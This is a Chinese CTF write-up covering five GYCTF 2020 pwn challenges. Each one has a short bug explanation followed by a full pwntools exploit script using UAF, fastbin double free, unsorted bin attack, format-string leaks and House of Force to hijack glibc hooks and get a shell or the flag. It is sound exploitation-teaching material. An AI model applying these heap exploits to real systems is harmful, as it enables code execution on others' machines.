
新春战疫公益赛复盘(一)

作者: cnitlrt | 来源:发表于2020-03-19 21:28 被阅读0次

    gyctf_2020_document

    堆上存有指针，通过 UAF 劫持堆上的指针即可控制 free_hook 或者 malloc_hook，从而 getshell。注意：exp 中的 libc 偏移（main_arena+88、__free_hook、system）是硬编码的，只对题目给的那份 libc 有效。

    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    from LibcSearcher import LibcSearcher
    # Verbose pwntools logging: every byte sent and received is printed. Useful
    # while developing the exploit, very noisy against a remote target.
    context.log_level = 'debug'
    
    binary = 'gyctf_2020_document'
    elf = ELF('gyctf_2020_document')
    # libc is resolved from the local binary's dependencies, but the offsets used
    # later in the exploit are hard-coded rather than read from this object, so
    # they only hold if the target runs the same libc build.
    libc = elf.libc
    context.binary = binary
    
    # DEBUG = 1: this version of the script only ever runs against a local
    # process -- the remote host/port were never filled in.
    DEBUG = 1
    if DEBUG:
      p = process(binary)
    else:
      host = ""
      port =  0
      p = remote(host,port)
    # Leak helpers: read up to the high byte of a user-space pointer (0x7f for
    # 64-bit libc/stack addresses, 0xf7 for 32-bit) and unpack the trailing
    # bytes. Written for Python 2 (str is bytes); under Python 3 recvuntil
    # returns bytes and the "\x00" ljust fill would need to be b"\x00".
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    # Thin I/O wrappers. Arguments are coerced with str() so ints can be passed
    # as menu choices and indices; se/sl deliberately send the payload raw.
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def add(name, sex, payload):
        """Menu option 1: create a record with the given name, sex and information.

        The three fields are sent with sendafter (no trailing newline), exactly
        as supplied, so fixed-width payloads such as p64() structs are not
        terminated early.
        """
        p.sendlineafter("Give me your choice : \n", "1")
        fields = (("name\n", name), ("sex\n", sex), ("information\n", payload))
        for prompt, value in fields:
            p.sendafter(prompt, str(value))
    def show(idx):
        """Menu option 2: print record ``idx`` (the exploit uses it on a freed record to leak libc)."""
        choice, index = "2", str(idx)
        p.sendlineafter('Give me your choice : \n', choice)
        p.sendlineafter('Give me your index : \n', index)
    def free(idx):
        """Menu option 4: delete record ``idx``.

        The exploit relies on the record still being reachable afterwards
        (use-after-free), so no bookkeeping is done here.
        """
        index = str(idx)
        p.sendlineafter('Give me your choice : \n', "4")
        p.sendlineafter('Give me your index : \n', index)
    def edit(idx, payload):
        """Menu option 3: overwrite the information of record ``idx``.

        The program asks for confirmation of a sex change first; it is always
        answered "Y" here, then ``payload`` is written raw (no newline).
        """
        index = str(idx)
        p.sendlineafter('Give me your choice : \n', "3")
        p.sendlineafter("Give me your index : \n", index)
        p.sendlineafter('Are you sure change sex?\n', "Y")
        p.sendafter('Now change information\n', str(payload))
    # Two records with 112-byte information bodies.
    add("aaaaaaaa","bbbbbbbb","c"*112)
    add("aaaaaaaa","bbbbbbbb","c"*112)
    # Use-after-free: record 0 is freed but the program still shows it, so the
    # freed chunk's fd pointer (a libc main_arena address, presumably from the
    # unsorted bin) is printed and picked up by l64().
    free(0)
    show(0)
    # Rebase libc from the leak. These offsets (main_arena+88, __free_hook,
    # system) are hard-coded values consistent with the Ubuntu 16.04 glibc 2.23
    # build; they are not derived from `libc` and must be re-derived for any
    # other libc -- the usual reason this exploit "almost" works elsewhere.
    libc_base = l64()-0x3c4b78
    lg("libc_base",libc_base)
    free_hook = libc_base+0x3c67a8
    lg('free_hook',free_hook)
    sys_addr =0x45390+libc_base
    # Reshape the heap: a record whose name/sex fields start with "/bin/sh\0"
    # (that string is what system() will receive), free record 1 and allocate
    # again so the dangling record 0 storage overlaps a live record.
    add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
    free(1)
    add("/bin/sh\x00","/bin/sh\x00","c"*0x70)
    # Writing through dangling record 0 overwrites the overlapping record
    # struct: a fake chunk header (size 0x21) and an information pointer aimed
    # at __free_hook-0x10. The -0x10 presumably compensates for the record
    # layout so the next edit lands exactly on the hook -- confirm in gdb.
    edit(0,p64(0)+p64(0x21)+p64(free_hook-0x10)+p64(0x1)+p64(0)+p64(0x51)+p64(0)*8)
    # Editing the hijacked record writes system() over __free_hook ...
    edit(3,p64(sys_addr)+p64(0)*13)
    # ... and freeing a record whose data begins with "/bin/sh" presumably
    # calls free("/bin/sh") -> system("/bin/sh").
    free(1)
    p.interactive()
    

    gyctf_2020_signin

    申请堆块的大小固定，由于是 Ubuntu 18（glibc 2.27）因此存在 tcache 机制：我们申请 8 个堆块然后全部释放，前 7 个进入 tcache，第 8 个进入 unsorted bin，接着用 unsorted bin attack 把 ptr 处的值改为非 0，从而可以调用后门函数。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    from LibcSearcher import LibcSearcher
    # Verbose pwntools logging of all traffic.
    context.log_level = 'debug'
    
    binary = 'gyctf_2020_signin'
    elf = ELF('gyctf_2020_signin')
    libc = elf.libc
    context.binary = binary
    
    # DEBUG = 0: talk to the BUUOJ practice instance. The port is per-instance
    # and will have changed; switch to DEBUG = 1 for a local process.
    DEBUG = 0
    if DEBUG:
      p = process(binary)
    else:
      host = "node3.buuoj.cn"
      port =  27747
      p = remote(host,port)
    # Leak helpers (unused in this exploit): read until the high byte of a
    # user-space pointer and unpack the trailing bytes. Python 2 str semantics.
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    # Thin I/O wrappers; str() coercion lets ints be passed as menu input.
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    def add(idx):
        """Menu option 1: allocate the fixed-size chunk for slot ``idx``."""
        for prompt, answer in (("your choice?", "1"), ("idx?\n", str(idx))):
            p.sendlineafter(prompt, answer)
    def free(idx):
        """Menu option 3: free slot ``idx``; the slot stays editable afterwards."""
        for prompt, answer in (("your choice?", "3"), ("idx?\n", str(idx))):
            p.sendlineafter(prompt, answer)
    def edit(idx, payload):
        """Menu option 2: write ``payload`` into slot ``idx`` (also works on a freed slot).

        The payload is sent raw, without a newline, so an 8-byte pointer
        overwrite stays exactly 8 bytes.
        """
        p.sendlineafter("your choice?", "2")
        p.sendlineafter("idx?\n", str(idx))
        p.send(payload)
    def backdoor():
        """Menu option 6: the hidden handler, usable once the global pointer the binary checks is non-zero."""
        choice = "6"
        p.sendlineafter("your choice?", choice)
    # Allocate and free eight fixed-size chunks. On the glibc 2.27 target the
    # first seven frees fill the tcache bin; the eighth lands in the unsorted
    # bin (per the writeup), so its fd/bk point into libc's main_arena.
    for i in range(8):
        add(i)
    for i in range(8):
        free(i)
    # Unsorted-bin attack: the freed chunk is still editable, so overwrite its
    # bk with target-0x10. When the next malloc takes this chunk out of the
    # unsorted bin it writes the bin's address to bk->fd, i.e. to 0x4040C0 --
    # the global pointer the backdoor checks. 0x4040C0 is an absolute address,
    # so the binary is presumably non-PIE; no leak is needed.
    edit(7,p64(0x4040C0-0x10))  # unsorted bin attack
    add(8)
    # The backdoor only requires that pointer to be non-zero, which the bogus
    # libc address written above satisfies.
    backdoor()
    p.interactive()
    

    interesting

    先利用格式化字符串漏洞泄露 libc 地址，程序又存在 UAF，可直接构造 fastbin double free 链劫持 malloc_hook 为 one_gadget。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    from LibcSearcher import LibcSearcher
    # Verbose pwntools logging of all traffic.
    context.log_level = 'debug'
    
    binary = 'interesting'
    elf = ELF('interesting')
    libc = elf.libc
    context.binary = binary
    
    # DEBUG = 0: talk to the BUUOJ practice instance (port is per-instance and
    # will have changed); DEBUG = 1 runs the local binary instead.
    DEBUG = 0
    if DEBUG:
      p = process(binary)
    else:
      host = "node3.buuoj.cn"
      port =  25188
      p = remote(host,port)
    def debug(cmd):
      """Pause until Enter is pressed, then attach gdb to the target with script ``cmd``."""
      raw_input("debug:")
      gdb.attach(p, gdbscript=cmd)
    # Leak helpers (unused here -- the leak below comes from a format string).
    # Python 2 str semantics are assumed.
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    # Thin I/O wrappers; str() coercion lets ints be passed as menu input.
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    sl  = lambda payload: p.sendline(payload)
    ru  = lambda a     :p.recvuntil(str(a))
    # Format-string leak: the greeting is echoed through printf, so "%17$p"
    # prints the 17th argument slot on the stack. The marker string lets us
    # find our output in the echo.
    sla("please:","OreOOrereOOreO%17$p")
    sla(" to do :","0")
    ru("OreOOrereOOreO")
    ru("0x")
    # 12 hex digits = a 48-bit user-space pointer. The 0x20830 rebase implies
    # the leaked slot holds __libc_start_main+240 of the Ubuntu 16.04 glibc
    # 2.23 build; the hook/one_gadget offsets below are for that build too.
    libc_base = int(p.recv(12),16)-0x20830
    lg("libc_base",libc_base)
    malloc_hook = libc_base+0x3c4b10
    lg("malloc_hook",malloc_hook)
    # one_gadget candidates for that libc; index 3 is the one whose register/
    # stack constraints held at the malloc call site used below.
    o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
    one = o_g[3]+libc_base 
    lg("one",one)
    def add(size, O, length, RE):
        """Menu option 1: create an Oreo with an O buffer of ``size`` bytes and a RE buffer of ``length`` bytes.

        Sizes are sent as lines; buffer contents are sent raw (sendafter) so
        binary payloads such as a forged fastbin fd are not cut short.
        """
        steps = (
            ("to do :", "1", True),
            ("length :", str(size), True),
            ("O : ", str(O), False),
            ("length :", str(length), True),
            ("RE : ", str(RE), False),
        )
        for prompt, data, with_newline in steps:
            sender = p.sendlineafter if with_newline else p.sendafter
            sender(prompt, data)
    def edit(idx, payload1, payload2):
        """Menu option 2: rewrite the O and RE buffers of Oreo ``idx`` (raw sends, no newline)."""
        p.sendlineafter("to do :", "2")
        p.sendlineafter("> Oreo ID : ", str(idx))
        for prompt, data in (("> O : ", payload1), ("> RE : ", payload2)):
            p.sendafter(prompt, str(data))
    def free(idx):
        """Menu option 3: free Oreo ``idx``. The exploit frees the same ID twice, so no check is done here."""
        for prompt, answer in (("to do :", "3"), ("> Oreo ID : ", str(idx))):
            p.sendlineafter(prompt, answer)
    def puts(idx):
        """Menu option 4: print Oreo ``idx`` (not needed by the final exploit)."""
        for prompt, answer in (("to do :", "4"), ("> Oreo ID : ", str(idx))):
            p.sendlineafter(prompt, answer)
    # Two Oreos: O buffers from 0x60 requests (0x70 chunks, fastbin sized),
    # RE buffers from 0x70 requests.
    add(0x60,"aaaa",0x70,"bbbb")
    add(0x60,"cccc",0x70,"dddd")
    # Fastbin double free: 1, 2, 1. The free of 2 in between defeats glibc's
    # only check (the chunk being freed must not already be at the bin head).
    free(1)
    free(2)
    free(1)
    # The next allocations pop the duplicated chunk and let us set its fd to a
    # fake chunk at __malloc_hook-0x23: there the 0x7f byte of a neighbouring
    # libc pointer acts as a size field that passes the 0x70 fastbin check.
    add(0x60,p64(malloc_hook-0x23),0x70,"aaaa")
    add(0x60,p64(malloc_hook-0x23),0x70,"bbbb")
    # Here the RE request is 0x60 instead of 0x70 -- presumably so that this RE
    # allocation is the one that pulls the fake chunk out of the 0x70 fastbin.
    # 0x13 bytes of padding then place the one_gadget address on __malloc_hook.
    add(0x60,p64(malloc_hook-0x23),0x60,"a"*0x13+p64(one))
    #gdb.attach(p)
    # Trigger: any malloc now jumps to the one_gadget, so start another add.
    sla("to do :","1")
    sla("length :",str(0x20))
    p.interactive()
    

    gyctf_2020_force

    用 house of force 劫持 malloc_hook。因为几个 one_gadget 的约束条件都不满足，直接写入 malloc_hook 会失败，所以需要把 one_gadget 写到 realloc_hook，再让 malloc_hook 指向 realloc+16，借 realloc 调整栈布局后调用 one_gadget。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    from LibcSearcher import LibcSearcher
    # Traffic logging left off for this exploit; enable when debugging.
    #context.log_level = 'debug'
    
    binary = 'gyctf_2020_force'
    elf = ELF('gyctf_2020_force')
    # Only libc.sym["__libc_realloc"] is read from this object; the hook and
    # one_gadget offsets below are hard-coded for the challenge's libc.
    libc = elf.libc
    context.binary = binary
    
    # DEBUG = 0: talk to the BUUOJ practice instance (port is per-instance and
    # will have changed); DEBUG = 1 runs the local binary instead.
    DEBUG = 0
    if DEBUG:
      p = process(binary)
    else:
      host = "node3.buuoj.cn"
      port =  25028
      p = remote(host,port)
    def debug(cmd):
      """Pause until Enter is pressed, then attach gdb to the target with script ``cmd``."""
      raw_input("debug:")
      gdb.attach(p, gdbscript=cmd)
    # Leak helpers (unused here -- the program prints chunk addresses itself).
    # Python 2 str semantics are assumed.
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    # Thin I/O wrappers; str() coercion lets ints be passed as menu input.
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    sl  = lambda payload: p.sendline(payload)
    def add(size, payload):
        """Menu option 1: malloc(``size``), fill it with ``payload``, and return the address the program printed.

        The program prints the chunk's user address as "0x..."; twelve hex
        digits cover a 48-bit user-space pointer. ``payload`` is sent raw,
        which is what lets the House of Force overflow reach the top chunk.
        """
        p.sendlineafter("puts\n", "1")
        p.sendlineafter("size\n", str(size))
        p.recvuntil("0x")
        chunk_addr = int(p.recv(12), 16)
        p.sendafter("content\n", str(payload))
        return chunk_addr
    def puts():
        """Menu option 2 (unused by the final exploit)."""
        choice = "2"
        p.sendlineafter("puts\n", choice)
    # A 0x200000-byte request exceeds the mmap threshold, so it is served by a
    # fresh mapping and the program prints its address. That mapping sits at a
    # fixed distance below libc on this target, hence the +0x200ff0 rebase --
    # layout-specific; re-measure for any other libc/kernel.
    addr = add(0x200000,"aaaaaa")
    lg("addr",addr)
    libc_base = addr + 0x200ff0
    lg("libc_base",libc_base)
    # Hard-coded __malloc_hook offset for the challenge's glibc 2.23 build.
    malloc_hook = libc_base+0x3c4b10
    lg("malloc_hook",malloc_hook)
    # House of Force, step 1: a 0x18 request gives a 0x20 chunk; the last 8
    # bytes of the payload overflow into the top chunk's size field and set it
    # to -1, so any later request "fits". top = header address of the top chunk.
    top = add(0x18,"a"*0x10+p64(0)+p64(0xffffffffffffffff))+0x10
    lg("top",top)
    realloc = libc_base+libc.sym["__libc_realloc"]
    lg("realloc",realloc)
    # one_gadget candidates for that libc; none works when called straight
    # from __malloc_hook (per the writeup), hence the realloc detour below.
    o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
    one = o_g[1]+libc_base 
    # Step 2: a huge request moves the top chunk up to just below
    # __malloc_hook (the -0x33 is tuned so the next 0x10 chunk's data starts
    # at __malloc_hook-0x10).
    offset = malloc_hook-top
    lg("offset",offset)
    add((offset-0x33),"aaaa")
    # Step 3: that chunk's data covers __realloc_hook (at hook-8) and
    # __malloc_hook: realloc_hook <- one_gadget, malloc_hook <- realloc+16.
    # Entering __libc_realloc past part of its prologue presumably shifts the
    # stack enough for the one_gadget's constraint to hold when realloc then
    # calls __realloc_hook; the +16 was found by trial.
    add(0x10,"a"*0x8+p64(one)+p64(realloc+16))
    #gdb.attach(p)
    # Trigger: the next malloc goes through __malloc_hook.
    sla("puts\n","1")
    sla("size\n",str(0x20))
    p.interactive()
    

    exceting

    程序一开始就把 flag 文件读进了内存，并且 0x6020a0 处刚好存在一个 0x60 的 size 字段，因此用 fastbin double free 把堆块劫持到 0x6020a0 的位置，便可以直接 show 出 flag。
    exp:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import sys
    import os
    from pwn import *
    from LibcSearcher import LibcSearcher
    # Traffic logging left off for this exploit; enable when debugging.
    #context.log_level = 'debug'
    
    binary = 'exceting'
    elf = ELF('exceting')
    # Not used by this exploit: no libc leak is needed since the target is a
    # fixed address in the binary itself.
    libc = elf.libc
    context.binary = binary
    
    # DEBUG = 0: talk to the BUUOJ practice instance (port is per-instance and
    # will have changed); DEBUG = 1 runs the local binary instead.
    DEBUG = 0
    if DEBUG:
      p = process(binary)
    else:
      host = "node3.buuoj.cn"
      port =  26040
      p = remote(host,port)
    def debug(cmd):
      """Pause until Enter is pressed, then attach gdb to the target with script ``cmd``."""
      raw_input("debug:")
      gdb.attach(p, gdbscript=cmd)
    # Leak helpers (unused here -- nothing needs to be leaked for this exploit).
    # Python 2 str semantics are assumed.
    l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
    l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
    # Thin I/O wrappers; str() coercion lets ints be passed as menu input.
    sla = lambda a,b  :p.sendlineafter(str(a),str(b))
    sa  = lambda a,b  :p.sendafter(str(a),str(b))
    lg  = lambda name,data : p.success(name + ": 0x%x" % data)
    se  = lambda payload: p.send(payload)
    sl  = lambda payload: p.sendline(payload)
    def add(length, ba, size, na):
        """Menu option 1: create an object with a ``ba`` buffer of ``length`` bytes and a ``na`` buffer of ``size`` bytes.

        Every field is sent as a line (sendlineafter), so a p64() payload
        arrives with a trailing newline appended.
        """
        steps = (
            ("do :", "1"),
            ("length :", str(length)),
            ("ba :", str(ba)),
            ("length :", str(size)),
            ("na :", str(na)),
        )
        for prompt, data in steps:
            p.sendlineafter(prompt, data)
    def free(idx):
        """Menu option 3: free object ``idx``. The exploit frees the same ID twice (fastbin dup)."""
        for prompt, answer in (("do :", "3"), ("ID :", str(idx))):
            p.sendlineafter(prompt, answer)
    def show(idx):
        """Menu option 4: print object ``idx``'s buffers."""
        for prompt, answer in (("do :", "4"), ("ID :", str(idx))):
            p.sendlineafter(prompt, answer)
    # Two objects whose buffers come from 0x50 requests (0x60 chunks, so they
    # go to the 0x60 fastbin -- the bin the fake size at 0x6020a0 must match).
    add(0x50,"aaaa",0x50,"aaaa")
    add(0x50,"bbbb",0x50,"bbbb")
    # Fastbin double free: 0, 1, 0 (the free of 1 in between defeats the
    # "already at bin head" check).
    free(0)
    free(1)
    free(0)
    # Re-allocate the duplicated chunk and write its fd: a fake chunk headed
    # at 0x6020a0-8, so its size field is the 0x60 the writeup found at
    # 0x6020a0 and its user data starts at 0x6020a0+8.
    add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
    add(0x50,p64(0x6020a0-8),0x50,p64(0x6020a0-8))
    # Empty inputs so nothing is written over the flag once a buffer aliases
    # the fake chunk; the 0x30 second request comes from a different bin.
    add(0x50,"",0x30,"")
    # By now object 2's buffer presumably points into the fake chunk, i.e. at
    # the memory the flag was read into -- verify the exact index in gdb if
    # the output is empty.
    show(2)
    #gdb.attach(p)
    p.interactive()
    
